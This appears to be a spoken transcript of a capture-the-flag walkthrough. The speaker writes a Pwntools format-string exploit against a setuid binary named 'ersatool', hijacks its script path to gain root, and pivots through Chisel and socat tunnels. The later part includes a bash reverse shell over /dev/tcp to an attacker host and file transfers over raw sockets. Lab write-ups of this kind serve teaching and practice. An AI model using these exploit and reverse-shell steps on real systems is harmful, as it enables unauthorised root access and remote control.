here I can show, let's see, I'm here, 016p. If I do 016p again, it's staying the same because the program isn't reloaded. And GDB also kills ASLR, so that's why you see all these 5s. But if I had done it, and we have to go into exploit, if we did it here, we can see the address still isn't changing. So we have the basis of what we want to do to create a Pwn script, at least to leak an address. So let's create the script, and then after we create the script, we'll verify that we did all the calculations correct, and we'll go into how to overwrite a variable. So I'm going to call this exploit.py, and we'll start our Pwntool script. So we'll do from pwn import star from, there we go. And p is equal to process ersatool. And then we want to read the prompt. So p.receive, we can do 64. We can say read prompt. And we want to send line print to enter the menu. Let's see, one more tab probably. There we go. Enter menu. Then we want to receive until it asks us for the CN. We don't have to explain that one. And then after it gives us the CN, we're doing send line. And this is where we do the very first 016p. And we want to record this. So leak is equal to p.receive. We can do a full 1024. Actually, if we just do 16, print leak. Let's see if this does it real quick. I probably need logging.success leak. Logging.success leak. Let's see what happens here real quick. Python 3, exploit.py. Process. Let's see, no attribute %s. Where did I screw up? ersatool. ersatool. See, starting. Forgot a V. REC until. Logging has no attribute success. SUCCESS, maybe info. Started. Stopped. If I just print leak. And then if I just do that, there we go. So now it's printing the address of where we suspect ext is. So what we want to do real quick is then calculate, we can call this ext, and then ersa dir is going to be ext minus, what was it, 111, I think that was. So we can now, I want to try the logging again. Was it, is it just log.success instead of logging? Let's see, bytes and int. So we need to convert int into, or this into int, like that. It's in hex form, so I probably need to tell it 16 like that. Leak is not defined. ext. Let's see. Let's just print everything. Print. And then ersa dir. We want to convert that into hex. Okay. So what I'm going to do now, we can say p.interactive like that. And I'm going to open up GDB. So let's close this and do ps-ef grep ersatool. And it is going to be this. So gdb-p for PID. And now we are debugging this. So if I do x/s on this, this should bring me to ext. And if I do x/s on this, we are now ersa directory. So we have leaked both of these successfully. So let's just clean this code up a little bit. And the first thing I want to do is figure out the log.success thing. So let's try this again. I'm going to actually read the error. So let's see. Oh, bytes is not text. It probably wants strings or decode like that. Bet that'll work. Yep, that does. So I was passing in a byte and it wanted string. So we can do log.success. We can say f-string, and we'll have ext leaked address and put that there like that. And then this one can be log.success. And we can say ersa dir address. And this is an int right now. Instead of doing the hex, let's use format strings for good measure. So we can say, we called this ersa dir, and then 016x. Like that. Let's see, we need to end that quote. If I execute this again, we have it looking a bit pretty. I didn't really pad this. Wonder if I could do that real quick. Let's see. P receive. So if I did int 16 like that, I should have copied the script before making this change. Is this going to work? 0x ext 016x. Is that gonna work? No. I'm not gonna confuse myself. Let's just go to how it was. It was good enough. Not perfect, but we knew what we were doing here. So leaked address, this is just ext.decode, like that. F-string is expecting it to end. Okay, so we have it working. The next piece is going to be a bit tougher to wrap the head around because we're going to be writing stuff into this variable one at a time. So if I do the %16 or what was it, %016p, we're just leaking this address. Now, what we want to do is be able to control the address of something we can write. So I have to make a payload for this first. Let me go back a bit. The reason why we're going to be caring so much about padding is because this address has a null byte. In a perfect world, this doesn't have a null byte, and we can just write this string to the beginning, and we know exactly where this beginning string is with our printfs. But we can't do that because the null byte here, we'd write it like F0307770A9D55, and then the null bytes would come, and then we do our format string payload. But because these null bytes happen, this piece never happens. However, we could put this memory address on the other end of the payload. We just have to figure out exactly where that is. And when we do that, we always have to be cautious about padding because our payload is after the junk instead of before it. So what I'm going to do real quick is kind of spitball what I want to do. So let's say %10, then this piece doesn't exactly matter probably. I just want to put something there. And then we do a dollar, and then we want to write characters. Lowercase e or something's like 100 and something, I think. So I know I want 3 characters here. And then we do a p. And then this piece is what's going to matter, but we can just do 10 here. And then $n. And anything after this is fine because I can't imagine our printf payload is going to be bigger than this. So I'm just going to do echo-n, wc-c, and it's 9 characters. I like keeping everything in increments of 8. So I'm going to add a bunch of stuff to the end of this. So we can say, is that really 9? If I put this in single quotes, it's 13. If I did that echo-n without single quotes, it probably translated the dollar signs, but that is a good catch. So we can add a blank A 3 times. And if we ever see 4.1 in our payload, we know we don't want to do that. This memory address or this space is going to be reserved for our payload. Then I'm going to do 8 Bs. Then we'll do 8 Cs. Is that 8? 1, 2, 3, 4. 1, 2, 3, 4. So this is going to be pretty much our payload. And if I put this in here, let's go execute ersatool again, print, and it just seg faulted. What? I did not expect that. Oh, because I have it writing. So I wrote to a random spot in memory and crashed the program. Oh, let's see. So let's do %10, and we need to replace all these with A's actually. So let's echo-n, let's get rid of that -n. Let's see. 1, 2, AA. 2, 3, 4. 1, 2, 3, 4. 1, 2, 3, 4. 10. And I just added 1, 2, 3, 4, 5. 1, 2, 3, 4, 5. Okay, I hope this is still, if I grab this will be 16 hopefully. Echo-n, wc-c, 16. Okay. So this payload won't be writing anything into memory, so we should not seg fault it. And it was 10. I just did 10 because I wanted double digits in case this went into double digits, but I can see 42's right here, and that is all my B's. If I did not get as lucky as I did, we'd start at like 9 and then send the payload. And we'll probably have to add another A because, again, all this spacing matters, or padding, I should say. And here we see it not printing what we want. We wanted all these 4 2's because that means it's printing this. If I change this, if I went here, copy, and we put 8 C's, and then we can do D's, doesn't really matter. We're now printing 43's. And this matters because we're going to be writing into this, whatever memory address is here. So let's go back into our payload. So if we go into exploit, I can go into here. And now we can say p.sendLine. I'm going to say %10. This one doesn't matter. It's mainly for spacing. We want to write 47, and 47 is a slash. So if I'm going in here, all these characters are going to be in the decimal, and slash is 47. So let's go back to here. So I print 47 things to the screen, and then I'm going to grab the memory address. And I'm not writing that yet. That's going to be in like a second, but we're writing it. The $n is going to write 47 at whatever this string is. And here's where the padding becomes important. So if I just ljust 64 is not the length. We wanted 16. And we can just put a period like that. And if I cat this so I can copy easier, if we go into Python, we can see exactly what this looks like. So Python 3, print, like that. And we just printed 16 characters. So again, this gets us to where our B's are. I screwed that up though. I wanted 16 like that because all the padding I want it to be is periods. So glad I took the time to show you that because caught a bug that would have bit me later. So ljust, it's going to do that. Okay, and then we want to write the memory address of ersatool. And we close that line. And what we just did here is a slash. So we're going to need to do a lot more. And this will be dev/shm. Well, I guessed that right of the number of things I did. But 47, if I go back to my ASCII table, D is going to be 100, then E is 101. So 5 is this. So I said 100, 101. And like, this is where the ljust helps because we just increased this length by 1, but because we're padding in this Python, we don't really have to worry about that. So now we need V, and V is going to be 118, 118. We already had the slash, that's 47. S is here, 115, and H is 104, so 115, 104, 115, 104, and then M. M is going to be 109. Okay, so let's try running this now. So if I do Python 3 exploit.py, hopefully we do not segfault. And I'm just going to close this GDB session or whatever I had there. Cannot concatenate string to bytes. Let's see. It's how I have this ersatool, right? Can only concatenate string, not bytes. let's see, what is, so if I just do ersa dir, let's just print this real quick to see exactly what that is. Let's see. I wonder if it's the actual payload here, if I have to convert this. So .encode, maybe that's it. Whoops. .encode. I swear, like, dealing with the correct type and getting all that is correct is probably where I spend half the time when I code these scripts, especially within Pwntools Python 3. So maybe that'll work. That looks potentially better. I don't know if that is it, but we can certainly check. ps-ef grep ersa gdb-p112978. And then we wanted to x/s and ersa dir. And it's just m. Because we forgot something. We successfully wrote it, but we kept overwriting the same exact thing, right? So if I go back to the script, if I do +1, +2, +3, 4, 5, 6, 7. So now let's check this again. So exit GDB. Run the exploit script. And now we can do ps-ef grep gdb, or grep ersa, and gdb-i 113072, or -p for PID. And then x/s, and was it ersa dir? We have now successfully wrote it to dev shm. Instead, it was before like opt easy RSA. So now we can overwrite this variable. And when we call the system, it should now execute easy RSA out of that. So let's do dev shm v easy RSA. Say it's bin bash. I'm going to do echo pwned. So if it ever echoes pwned, we know we pwned it. So I do help here. Help. Continue, because I'm debugging it. And we probably should get out of GDB, because when you're in GDB, it's going to break that setuid thing. ls chmod plus x. This also has to be executable. So we go here, and then what do we do next? Enter help create help. Let's see, we did something to dev shm. Error reading dev shm pki. So it's trying to read files there. We didn't get it to go to system. Is it revoke? How do we get to system? Not implemented. Let's see. V easy RSA. We're also going to touch temp pwned. ls-la temp pwned. Doesn't exist. So let's try running it again. Help create test. Does that file exist? It does exist. So it's just not printing that pwned to screen. Yeah, it did not print pwned to screen, but we definitely know it executed it because we have that temp pwned. The reason why it's ipsec on this is because I never gave it setuid when I copied it over. But if we did chmod, I think 4755, ersatool, lsla, ersatool, This will probably now work. rm temp pwned, Python 3 exploit, enter, create test, lsla temp pwned. It didn't, but I'm confident it'll work on the remote system, hopefully. I'm probably screwing something up. Oh, I did not chown root ersatool. That's what I forgot. So let's try this. Last time, hopefully. rm-rf, temp pwned. Doesn't exist. Run, or not run, Python 3, exploit.py, create test, temp pwned. Because when I changed the owner to root, it took my set UID permission away. Like, how many times can you fail this? Curse of the demo gods. But that's how you know I've played with this binary a lot, that as soon as I do a mistake, I'm like, oh no, that's exactly what happened. So, create test. And it is now owned by root. So if it had a set GID call, then it would change the group probably. But yeah, we know we have the exploit working. Now, the big painful thing is we don't have Pwntools on the remote host. If we even have this remote host up still, we had to do some tunneling to get to it. PKI listening. I think all my shells may have died. So we'll have to get those again. And then when we get there, we probably need to copy like socat and then send a netcat session all the way back to our box so we can interact with it over Pwntools. So what I'm going to do is exit a bunch of things so we can clean up our sessions a little bit. Let's see, that is 3. What is 6? We can close this. 7, we don't need that. Okay. So this is all we should need. Open up Chisel, and it's connected there. I'm going to refer to some notes I have to figure out exactly what I did to get to the PKI box, because I took a break just before doing that printf thing. So I took a few minutes to think about the tunnel, and I haven't actually done this yet, so hopefully it works, but I want to go through my thought process on what I'm about to do. So probably should write all these port forwards down so we can understand what they do. So let's do this. Okay. So this, let's see, I want to get syntax highlighting. I do that, wnotes.sh, there we go. Now we get syntax highlighting. So this one is going to allow attacker box to hit PKI on port 80. Then what this does is allows PKI box to hit ATK box on port 9001. And we use that for the shell. So we probably want to add another one. So 192.168.254.2. We'll call this, well, we can put both these to 9001 now. We can say 9002, 172.30.09, 9002. Yeah, 9002. We'll say web server on ATK. And then our box will need to hit the PKI box on a port that we use for standing up this ersatool binary. So we can say TK box hit PKI on ERSA port, And we can set that port to anything we want. So this will be our 8000 PKI, or wait, we want to listen on 8001. We'll go to the PKI on port, we'll say 9003. So I think this will be all we need. So I'm going to cat notes. I'm going to run this chisel command with everything we have. So chisel like that, then copy this to get all of our ports lined up. And like I said, this is a complex port forwarding attack because we're using so much. And I'm really hoping it works. Connection refused to something. Is that because I can't talk to it yet? Attack box to hit PKI. Let's see, listening. Did something get screwed up here? Let's see, v, let's cpnotes.sh. Could have swore that was right, but it's always possible copy and pasting screwed something up. So let's copy and paste the entire thing instead of breaking it up. Cat notes.sh. Copy this entire string. Give up. Let's see. SS LNTP grep 8001. Am I already listening on this port? No. Grep 8000. I'm not listening. Oh, wait, I was. 8001 is the port I'm listening Chisel on. So that is why. vnotes, we can say 8001. Let's do 8003, I guess. Cat notes.sh. And we can execute this. I really hate when we get down to like using all of these ports. Okay. That looks good. Let's open up a new pane. We'll call this forward. And let's see, NC LVNP 9001. We go here. And let's see if we get the reverse shell again. I'm just sending a bunch of requests, and we're on the PKI server. So Python 3-c import pty, pty.spawn, bin bash, stty raw minus echo, fg, enter, enter. So the first thing we have to do is see if we have socat here. We probably don't, so we have to copy it up. Not a big deal. So let's go back to our forwards, cd dub, which socat. And the first thing I'm going to do is copy this version of socat up. And then if this doesn't work, I'm going to go to the static library page. Python, let's see. The first thing we have, let's see. Where am I listening on web? I think that would be 8003 I have, or no. 9002 is my web server. So let's do Python 3-m hp.server 9002. So if I wget 192.168.254.2 9002/socat, please download. Curl? Oh, you gotta be kidding me. Can I like cat that? Oh wait, I'd have to dev TCP. 9002 like that. And then on this forward, NC LVNP 9002 socat. Permission denied. Let's see, dev shm. I think that permission denied was I just can't write to my home directory, which is a bit weird. I have a single quote there. LSLA. Socat is 0 bytes, so that did not work. It did connect. Let's see. We want to get this binary up there. Can I do echo instead? That is 1. It's not exactly what I wanted. V test.text hello world. NC LVNP 9002 test.text. So that's not writing. So we have to figure out a good way to write this. Maybe I could use Python to download it. But I swear I've done curl with the dev TCP thing and wrote before. What did I just do? Echo. Let's try cat. Cat test.text, hello world. So what I'm guessing happened before is socat had a null byte or something and canceled my transfer. So I'm going to base64 encode socat to socat.b64. And we're going to try doing it this way. To socat.b64. It's taking longer, and that looks promising. So let's do base64-d, socat like that, to socat, chmod plus x, socat. Permission denied. This may be because I'm in dev shm, and maybe that can't write. Yes, dev shm has no exec. So let's try copying socat to temp /socat error loading library. So this is because it is not static encoded, but we have transferred it. So let's go static binaries GitHub. Go here, socat. That's not what we expected. Let's see. Binaries, Linux, x86-64, socat. Download. And over here, CP downloads socat here. Base64 encode it. And then we also need to download it. Stand up the listener. We need, let's see, not echo, it's cat. Like that. And then let's just move socat to socat.b64, base64-d. Whoops. ls chmod plus x socat. There we go. We finally have socat running. So what I want to do is go all the way back to what port I'm expecting it. Let's see. No longer need that web server. Let's say we want to go to downloaded. No, exploit is what we want. And where's my notes? Did I put it here? Yeah. vnotes sh like this. And we want to be able to hit this. So it was the last one. PKI 9003 is what we want to listen on. So we want to do socat TCP-listen 9003, reuse address and fork it, and execute ersatool. And if I do nc localhost, what was it, 8003? We're now on this box. So all that's left to do is update our attack script to use this box. And I think bash scripts should be able to still execute out of here. If it doesn't, then I'll move it over to temp. Echo bin bash easy RSA echo bash easy RSA. So if I cat this file, should just execute bash. I probably should have done bash dash p. Let's just redo that. Easy RSA, just in case it's needed. chmod plus x, easy RSA. We'll see if it works. I'm passing the system command to this, so maybe it will. We can also touch temp pwned. Okay. So now let's update our Pwntools script. So vim exploit.py, and all we do is change p now is equal to remote 127.0.0.1 and 9003. So if I execute Python, well, hold on. Yes, I'm going interactive. So if I do Python 3 exploit.py, we could not connect, and that's because socat is not running. Where is the socat command? Run it. We were on 8002, I think, is what I connected to, because 8001 is what I had Chisel server running as. Forward. Let's see. Where's that command? 8003. So we sent it. So I'm going to create test. And it did not execute bash. Wait, ID, exit. So it does not look like it worked. ls. And there's not a temp pwned. Let's see. The one thing I'm going to do, I guess we can change this to be just temp and see if that works. Confused right now, because I'm pretty sure I had done it in this directory before. But let's change it to temp and see what happens. So yank 4 lines, and we want TMP. And the numbers, man ASCII, 116. M is going to be, where are you? 109. And P is 112. What if I need a trailing slash? I shouldn't, because it did work on my local box when we were playing with it. And it was pretty reliable. So let's see, we did socat. Run this. And then create test. And what is this saying? Error reading /t/pki. So it did not write TMP. Do I have the output from before? Dev SHM, so that wrote correctly back then, but TMP did not. If I do LSLA, probably should copy dev SHM, easy RSA here, chmod plus X, easy RSA. Because we definitely need that. And let's see. I'm also going to put the touch before the bash, because that bash command could be hanging, and we just don't get the shell that way. So echo bin bash 2, easy RSA, echo touch temp pwned, easy RSA, echo bash -p, easy RSA. Okay, so that now should be good. Run socat. Run this exploit again. No pwned. Sad day. V exploit.py TMP. And we did increment that. Weird. You can add a slash to the end. Let's just add a null byte actually. 0, 0. Oh, we don't want to do that, because after that it puts the string. So we don't want to do that. Let's just add a slash. 3 exploit.py. We are still listening. Create test. Where is TMP? It's still just /t. Create IPsec. So something I'm doing is changing things, because no longer is a T there. But just do create T. do create temp. It's just // now. I wonder if it's because like the string is so small. This is weird. Go back to exploit.py. I'm going to leave it at dev.shm. And it may just be getting too late for me, and I may have to just continue this in the morning. Because this is not making sense to me. Create test. If I go up here, it is just /d. dev.shm. Let's see, is this going to be local or remote? So we connected to 127.0.0.1 on 8003. I just did create test, and it did print dev.shm. And now it's just doing /d. That's still on 8001. Create test. Create test. Do this. Create test. Something is different. And I don't know what it is. Maybe it's I'm sending data too fast and there was no latency when I did it through a process, but doing it through a network there is latency. So I wonder if I go back here, I probably only need /temp. If I do p.receive, is it until? And I think it sent 2 new lines. So if our script hangs, we know this receive until is broken. So let's do Python 3 exploit.py. We've connected. Create test. And I think, no, we still overwrote. Let's see. Let's put some more logs in. Log. And we can say sending payloads. And then payloads sent. And we can say p.sendLine. And then p.receive until. There's just a colon, I think, and C localhost 8003. Yep, just not a colon, a pound. And then we send line B create test. And we can stay hang in interactive. Python 3 exploit.py. Payloads sent. And still error reading just //. Which I really don't like. Broken pipe. I wonder if we're sending a bad character now. Don't know what bad character we would be sending. Could it be like a null byte in this? But I don't think so. if I do something there, payload sent, create test, that just like crashed the program. So that's not it. Let's see. It's just nc localhost 8003 print test. Sure, that's fine. Create test. And it should create. I didn't even put the show the paths because it's downloading it's actually got files there. So we know we did some type of overwrite, but just did not work. Error reading, yeah, / PKI. Let's see. Still //. So this is going to be a crazy question. Oh, wait. It executed Pwn that time. So that time it worked. However, it did not at the same time. So we definitely have code execution, but I'm guessing one of these times I actually exited bash, which means I'm not done yet. ID. Let's see, exit, ID. That did not work. I don't know what I just did there. Wonder if it's just not a reliable exploit. Like, I wonder if this time, where it's hanging right now, it just worked. But I can't execute bash, so it hung. That's probably it. So, cat easy RSA. Let's see. Let's do, we still have a tunnel. So 172.30, no. This forward, which one is a web? We are listening, 9002 is where we can stand a reverse shell. So we want to send it to 172.30.09, and it should get to us. So let's see, nc lvm, it's just v, easy RSA. We can do bin bash, bash dash I, dev TCP 192.168.254.2/ what did I say? 9002. 0 and 1. Touch temp Pwn2. And that looks good. So nc lvnp easy RSA 9002 easy RSA cat dev TCP 192.168.254.2 9002 to easy RSA. Okay. NC LVMP 9002. And we're going to run this a few times. There we go. rhrough shell gotten. Maybe it was that simple. Is this now reliable? It was just I couldn't use a drop into a bash prompt. Let's see. That time it did not work. So it isn't 100% reliable. Let's see if I exit this, rerun it. Did not work that time. Did not work that time. There we go. Got a shell. So the exploit just itself is not fully reliable. But now we are root on the PKI server. And let's see, HTML. Index uploads. Let's see, what can we do? Is it just slash? Where is root.txt? Am I not done yet? I thought I was. Yeah, there we go. Cat root.txt. We can read the flag. Notes.txt as well to see all the resources used for this box. And there was a unintended with the exploit. If you ran like pspy when executing the ersatool, you can see it called some applications with a non-absolute path. I'm sure if you go to like OXDS blog, he'll talk about that, but I am tired, so I'm going to go to bed and just call it for the video. Take care, guys, and see you all next time.